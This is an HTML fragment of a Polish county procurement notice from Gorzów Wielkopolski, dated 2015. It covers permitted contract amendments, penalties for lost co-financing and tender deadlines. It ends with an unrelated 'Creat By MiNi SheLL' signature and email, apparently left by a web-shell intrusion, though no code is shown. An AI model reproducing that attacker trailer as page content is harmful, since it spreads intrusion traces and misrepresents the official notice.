<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ustawy Prawo zamówień publicznych. Wartość robót może zostać zwiększona lub zmniejszona w przypadku gdy na wniosek Zamawiającego ulegną zmianie parametry jakościowe lub techniczne materiałów lub urządzeń. W takim przypadku zmiana wartości zostanie dokonana za pomocą kosztorysu różnicowego. Zamawiający dopuszcza konieczność wprowadzenia zmian wynikających ze zmiany w
obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego oraz zmiany wynagrodzenia brutto w przypadku zmiany stawki podatku od towarów i usług. Dopuszcza się zmianę osób stanowiących kluczowy personel Wykonawcy. Zmiana może nastąpić na wniosek Wykonawcy, zawierające uzasadnienie zmiany oraz dokumenty potwierdzające, iż wskazane osoby spełniają warunki udziału w postępowaniu w ramach, którego Wykonawcy udzielono niniejszego zamówienia. Zamawiający nie dopuszcza zmiany terminu zakończenia zadania przez Wykonawcę. W przypadku utraty przez Zamawiającego dofinansowania na
skutek niewykonania zadania przez Wykonawcę w określonym terminie, Wykonawca zobowiązany będzie do uiszczenia całej kwoty dofinansowania utraconego przez Zamawiającego wraz z odsetkami liczonymi jak dla zaległości podatkowych oraz innymi kosztami poniesionymi przez Zamawiającego
wynikającymi z utraty dofinansowania. Wyjątkiem jest sytuacja gdy zmiana terminu realizacji niniejszej umowy nastąpi pisemnie za zgodą Zamawiającego. Zmiana taka dopuszczalna jest wyłącznie z przyczyn: warunków pogodowych uniemożliwiających prowadzenie robót zgodnie z przewidywaną technologią (opady, zbyt niskie temperatury), błędów projektowych lub zmiany warunków realizacji zamówienia z przyczyn, których nie można było przewidzieć przed zawarciem umowy, wystąpienia w czasie realizacji i na terenie objętym czynnościami Wykonawcy robót klęski żywiołowej, zmian w zasadach finansowania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatgorzowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gorzowie Wlkp. 
ul. J. Pankiewicza 5-7 
66-400 Gorzów Wlkp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 11:00, miejsce: Starostwo Powiatowe w Gorzowie Wlkp. 
ul. J. Pankiewicza 5-7, 66-
400 Gorzów Wlkp. 
Punkt Obsługi Interesanta (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com